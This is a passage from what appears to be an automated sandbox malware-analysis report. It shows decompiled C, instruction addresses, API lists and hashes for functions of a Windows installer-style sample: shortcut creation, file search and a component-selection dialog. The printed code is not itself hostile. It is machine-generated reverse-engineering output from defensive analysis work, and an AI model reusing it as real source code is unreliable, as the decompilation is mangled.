				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E4D( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x436000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                  0x004021b3
                                  0x004021bd
                                  0x004021c7
                                  0x004021d1
                                  0x004021dc
                                  0x004021df
                                  0x004021f9
                                  0x004021fc
                                  0x00402202
                                  0x00402205
                                  0x0040220f
                                  0x00402213
                                  0x00402213
                                  0x00402218
                                  0x00402229
                                  0x00402231
                                  0x004022e8
                                  0x004022e8
                                  0x004022ef
                                  0x00402237
                                  0x00402237
                                  0x00402246
                                  0x0040224a
                                  0x0040224d
                                  0x00402253
                                  0x00402261
                                  0x00402264
                                  0x00402266
                                  0x00402271
                                  0x00402271
                                  0x00402276
                                  0x00402278
                                  0x0040227f
                                  0x0040227f
                                  0x00402282
                                  0x0040228b
                                  0x0040228e
                                  0x00402294
                                  0x00402296
                                  0x004022a0
                                  0x004022a0
                                  0x004022a3
                                  0x004022ac
                                  0x004022af
                                  0x004022b8
                                  0x004022be
                                  0x004022c0
                                  0x004022ce
                                  0x004022ce
                                  0x004022d1
                                  0x004022d7
                                  0x004022d7
                                  0x004022da
                                  0x004022e0
                                  0x004022e6
                                  0x004022fb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004022e6
                                  0x004022f1
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                  • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CreateInstance
                                  • String ID:
                                  • API String ID: 542301482-0
                                  • Opcode ID: b46a74587854a4a5a635a024edcd41f24a6e269412bb0254ad6851c745bb5835
                                  • Instruction ID: 543bd56792285dd9977ebe6a5c934514532920c251de70bc34d4fa366edb348e
                                  • Opcode Fuzzy Hash: b46a74587854a4a5a635a024edcd41f24a6e269412bb0254ad6851c745bb5835
                                  • Instruction Fuzzy Hash: 80411771A00209EFCF40DFE4C989E9D7BB5BF49308B20456AF505EB2D1DB799941CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 39%
                                  			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E0040644E( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406507();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                  0x00402923
                                  0x0040293e
                                  0x00402949
                                  0x0040294a
                                  0x00402a94
                                  0x00402925
                                  0x00402928
                                  0x0040292b
                                  0x0040292e
                                  0x0040292e
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: FileFindFirst
                                  • String ID:
                                  • API String ID: 1974802433-0
                                  • Opcode ID: 4712ae4617162a5ad1e1685ee19aa8be35db2a8aaa72db92bc2a724f02566d86
                                  • Instruction ID: 26775ad4c1080374fb75430f90045566014d5e2c4dab898babe53efe7e17598a
                                  • Opcode Fuzzy Hash: 4712ae4617162a5ad1e1685ee19aa8be35db2a8aaa72db92bc2a724f02566d86
                                  • Instruction Fuzzy Hash: F3F08271A04104EFD701DBA4DD49AAEB378FF14314F60417BE101F21D0E7B88E129B2A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404ED0 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E00404ED0(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a248;
				_v28 =  *0x42a230 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a239 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E1E(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a238) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x4236ec;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423700;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x4236ec = 0;
								 *0x423700 = 0;
								 *0x42a280 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a239 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404E9E();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423700;
									_t201 =  *0x42a248;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a24c <= 0) {
										L86:
										if( *0x42a2de == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x4291fc + 0x10)) != 0) {
											E00404DD9(0x3ff, 0xfffffffb, E00404DF1(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a24c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423700);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a280 = _t291;
					 *0x423700 = GlobalAlloc(0x40,  *0x42a24c << 2);
					_t258 = LoadImageW( *0x42a220, 0x6e, 0, 0, 0, 0);
					 *0x4236f4 =  *0x4236f4 | 0xffffffff;
					_t297 = _t258;
					 *0x4236fc = SetWindowLongW(_v8, 0xfffffffc, E004054DD);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x4236ec = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x4236ec);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406544(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404463(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404463(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a24c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423700 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423700 + _t300 * 4) = _t284;
									_v16 =  *( *0x423700 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a24c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E00404498(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404498(_v12);
								L93:
								return E004044CA(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                  0x00404ed7
                                  0x00404ef0
                                  0x00404ef5
                                  0x00404efd
                                  0x00404f03
                                  0x00404f19
                                  0x00404f1c
                                  0x00405147
                                  0x0040514e
                                  0x00405162
                                  0x00405150
                                  0x00405152
                                  0x00405155
                                  0x00405156
                                  0x0040515d
                                  0x0040515d
                                  0x0040516e
                                  0x0040517c
                                  0x0040517f
                                  0x00405195
                                  0x0040520a
                                  0x0040520d
                                  0x0040520f
                                  0x00405219
                                  0x00405227
                                  0x00405227
                                  0x00405229
                                  0x00405233
                                  0x00405239
                                  0x0040523c
                                  0x0040523f
                                  0x0040525a
                                  0x00405241
                                  0x0040524b
                                  0x0040524b
                                  0x0040523f
                                  0x00405233
                                  0x00000000
                                  0x0040520d
                                  0x0040519a
                                  0x004051a5
                                  0x004051aa
                                  0x004051b1
                                  0x004051b6
                                  0x004051ba
                                  0x004051c5
                                  0x004051c5
                                  0x004051c9
                                  0x004051cd
                                  0x004051d1
                                  0x004051e4
                                  0x004051d3
                                  0x004051d3
                                  0x004051da
                                  0x004051e0
                                  0x004051dc
                                  0x004051dc
                                  0x004051dc
                                  0x004051da
                                  0x004051e8
                                  0x004051ea
                                  0x004051fd
                                  0x00405200
                                  0x00405203
                                  0x00405203
                                  0x004051cd
                                  0x00000000
                                  0x004051ba
                                  0x0040519c
                                  0x004051a3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040525d
                                  0x0040525d
                                  0x00405264
                                  0x004052d5
                                  0x004052dd
                                  0x004052e5
                                  0x004052e5
                                  0x004052ee
                                  0x004052f0
                                  0x004052f7
                                  0x004052fa
                                  0x004052fa
                                  0x00405300
                                  0x00405307
                                  0x0040530a
                                  0x0040530a
                                  0x00405310
                                  0x00405316
                                  0x0040531c
                                  0x0040531c
                                  0x00405329
                                  0x0040548a
                                  0x00405491
                                  0x004054ae
                                  0x004054b4
                                  0x004054c6
                                  0x004054c6
                                  0x00000000
                                  0x0040532f
                                  0x00405331
                                  0x00405336
                                  0x0040533b
                                  0x00405340
                                  0x00405342
                                  0x00405342
                                  0x00405343
                                  0x00405344
                                  0x00405346
                                  0x00405346
                                  0x0040534e
                                  0x0040538f
                                  0x00405391
                                  0x004053a1
                                  0x004053a4
                                  0x004053a9
                                  0x004053b0
                                  0x004053b3
                                  0x00405455
                                  0x0040545e
                                  0x00405466
                                  0x00405466
                                  0x00405474
                                  0x00405485
                                  0x00405485
                                  0x00000000
                                  0x00405474
                                  0x004053b9
                                  0x004053bc
                                  0x004053c2
                                  0x004053c7
                                  0x004053c9
                                  0x004053cb
                                  0x004053d1
                                  0x004053d8
                                  0x004053dd
                                  0x004053e4
                                  0x004053e7
                                  0x004053e7
                                  0x004053ee
                                  0x004053fa
                                  0x004053fe
                                  0x00405400
                                  0x00405400
                                  0x004053f0
                                  0x004053f2
                                  0x004053f2
                                  0x00405420
                                  0x0040542c
                                  0x0040543b
                                  0x0040543b
                                  0x0040543d
                                  0x00405440
                                  0x00405449
                                  0x00000000
                                  0x00405350
                                  0x0040535b
                                  0x0040535e
                                  0x00405363
                                  0x00405365
                                  0x00405369
                                  0x00405379
                                  0x00405383
                                  0x00405385
                                  0x00405388
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040536b
                                  0x0040536b
                                  0x00405371
                                  0x00405373
                                  0x00405373
                                  0x00405374
                                  0x00405375
                                  0x00000000
                                  0x0040536b
                                  0x0040534e
                                  0x00405329
                                  0x0040526c
                                  0x00000000
                                  0x00405282
                                  0x0040528c
                                  0x00405291
                                  0x00000000
                                  0x00000000
                                  0x004052a3
                                  0x004052a8
                                  0x004052b4
                                  0x004052b4
                                  0x004052b6
                                  0x004052c5
                                  0x004052c7
                                  0x004052cb
                                  0x004052ce
                                  0x00000000
                                  0x004052ce
                                  0x0040526c
                                  0x00404f22
                                  0x00404f27
                                  0x00404f30
                                  0x00404f37
                                  0x00404f49
                                  0x00404f54
                                  0x00404f5a
                                  0x00404f68
                                  0x00404f7c
                                  0x00404f81
                                  0x00404f8e
                                  0x00404f93
                                  0x00404fa9
                                  0x00404fba
                                  0x00404fc7
                                  0x00404fc7
                                  0x00404fca
                                  0x00404fd0
                                  0x00404fd2
                                  0x00404fd5
                                  0x00404fda
                                  0x00404fdf
                                  0x00404fe1
                                  0x00404fe1
                                  0x00405001
                                  0x00405001
                                  0x00405003
                                  0x00405004
                                  0x00405009
                                  0x0040500f
                                  0x00405013
                                  0x00405018
                                  0x00405020
                                  0x00405024
                                  0x00405029
                                  0x0040502e
                                  0x00405036
                                  0x00405039
                                  0x00405109
                                  0x0040511c
                                  0x00000000
                                  0x0040503f
                                  0x00405042
                                  0x00405045
                                  0x00405048
                                  0x00405048
                                  0x0040504e
                                  0x00405057
                                  0x0040505a
                                  0x0040505e
                                  0x00405061
                                  0x00405064
                                  0x0040506d
                                  0x00405076
                                  0x00405079
                                  0x0040507c
                                  0x0040507f
                                  0x004050bd
                                  0x004050e8
                                  0x004050bf
                                  0x004050ce
                                  0x004050ce
                                  0x00405081
                                  0x00405084
                                  0x00405092
                                  0x0040509c
                                  0x004050a4
                                  0x004050ab
                                  0x004050b6
                                  0x004050b6
                                  0x0040507f
                                  0x004050ee
                                  0x004050ef
                                  0x004050fb
                                  0x004050fb
                                  0x00405107
                                  0x00405122
                                  0x00405125
                                  0x00405142
                                  0x00000000
                                  0x00405127
                                  0x0040512c
                                  0x00405135
                                  0x004054c8
                                  0x004054da
                                  0x004054da
                                  0x00405125
                                  0x00000000
                                  0x00405107
                                  0x00405039

                                  APIs
                                  • GetDlgItem.USER32 ref: 00404EE8
                                  • GetDlgItem.USER32 ref: 00404EF3
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F3D
                                  • LoadImageW.USER32 ref: 00404F54
                                  • SetWindowLongW.USER32 ref: 00404F6D
                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F81
                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404F93
                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404FA9
                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FB5
                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FC7
                                  • DeleteObject.GDI32(00000000), ref: 00404FCA
                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404FF5
                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405001
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040509C
                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050CC
                                    • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050E0
                                  • GetWindowLongW.USER32(?,000000F0), ref: 0040510E
                                  • SetWindowLongW.USER32 ref: 0040511C
                                  • ShowWindow.USER32(?,00000005), ref: 0040512C
                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405227
                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040528C
                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052A1
                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052C5
                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052E5
                                  • ImageList_Destroy.COMCTL32(?), ref: 004052FA
                                  • GlobalFree.KERNEL32 ref: 0040530A
                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405383
                                  • SendMessageW.USER32(?,00001102,?,?), ref: 0040542C
                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040543B
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00405466
                                  • ShowWindow.USER32(?,00000000), ref: 004054B4
                                  • GetDlgItem.USER32 ref: 004054BF
                                  • ShowWindow.USER32(00000000), ref: 004054C6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                  • String ID: $M$N
                                  • API String ID: 2564846305-813528018
                                  • Opcode ID: 8525e20a0051abda158ee0026944c2010c5087461c76e87d86fd24a5c04b36c4
                                  • Instruction ID: f25f8d73efcf6ba6a17deb726488d783a00b9a1a7703c2d4830b1b44d3514242
                                  • Opcode Fuzzy Hash: 8525e20a0051abda158ee0026944c2010c5087461c76e87d86fd24a5c04b36c4
                                  • Instruction Fuzzy Hash: 34027D70A00609EFDB20DF95CC45AAF7BB5FB84315F10817AE910BA2E1D7798A52CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404622 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E00404622(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
